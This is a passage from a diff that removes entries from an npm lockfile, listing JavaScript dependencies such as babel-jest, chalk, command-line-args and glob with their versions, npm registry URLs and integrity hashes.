"requires": { - "@swc/helpers": "^0.5.11", - "@types/command-line-args": "^5.2.3", - "@types/command-line-usage": "^5.0.4", - "@types/node": "^20.13.0", - "command-line-args": "^6.0.1", - "command-line-usage": "^7.0.1", - "flatbuffers": "^24.3.25", - "json-bignum": "^0.0.3", - "tslib": "^2.6.2" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "array-back": { - "version": "6.2.2", - "resolved": "https://registry.npmjs.org/array-back/-/array-back-6.2.2.tgz", - "integrity": "sha512-gUAZ7HPyb4SJczXAMUXMGAvI976JoK3qEx9v1FTmeYuJj0IBiaKttG1ydtGKdkfqWkIkouke7nG8ufGy77+Cvw==" - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "requires": { - "fill-range": "^7.0.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001517", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001517.tgz", - "integrity": "sha512-Vdhm5S11DaFVLlyiKu4hiUTkpZu+y1KA/rZZqVQfOD5YdDT/eQKlkt7NaE0WGOFgX32diqt9MiP9CAiFeRklaA==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "chalk-template": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/chalk-template/-/chalk-template-0.4.0.tgz", - "integrity": "sha512-/ghrgmhfY8RaSdeo43hNXxpoHAtxdbskUHjPpfqUWGttFgycUhYPGx3YZBCnUCvOa7Doivn1IZec3DEGFoMgLg==", - "requires": { - "chalk": "^4.1.2" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "command-line-args": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-6.0.1.tgz", - "integrity": "sha512-Jr3eByUjqyK0qd8W0SGFW1nZwqCaNCtbXjRo2cRJC1OYxWl3MZ5t1US3jq+cO4sPavqgw4l9BMGX0CBe+trepg==", - "requires": { - "array-back": "^6.2.2", - "find-replace": "^5.0.2", - "lodash.camelcase": "^4.3.0", - "typical": "^7.2.0" - } - }, - "command-line-usage": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/command-line-usage/-/command-line-usage-7.0.3.tgz", - "integrity": "sha512-PqMLy5+YGwhMh1wS04mVG44oqDsgyLRSKJBdOo1bnYhMKBW65gZF1dRp2OZRhiTjgUHljy99qkO7bsctLaw35Q==", - "requires": { - "array-back": "^6.2.2", - "chalk-template": "^0.4.0", - "table-layout": "^4.1.0", - "typical": "^7.1.1" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.4.0", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", - "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", - "requires": { - "ms": "^2.1.3" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.470", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.470.tgz", - "integrity": "sha512-zZM48Lmy2FKWgqyvsX9XK+J6FfP7aCDUFLmgooLJzA7v1agCs/sxSoBpTIwDLhmbhpx9yJIxj2INig/ncjJRqg==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-replace": { - "version": "5.0.2", - "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-5.0.2.tgz", - "integrity": "sha512-Y45BAiE3mz2QsrN2fb5QEtO4qb44NcS7en/0y9PEVsg351HsLeVclP8QPMH79Le9sH3rs5RSwJu99W0WPZO43Q==", - "requires": {} - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "flatbuffers": { - "version": "24.12.23", - "resolved": "https://registry.npmjs.org/flatbuffers/-/flatbuffers-24.12.23.tgz", - "integrity": "sha512-dLVCAISd5mhls514keQzmEG6QHmUUsNuWsb4tFafIUwvvgDjXhtfAYSKOzt5SWOy+qByV5pbsDZ+Vb7HUOBEdA==" - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==" - }, - "hpagent": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", - "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": 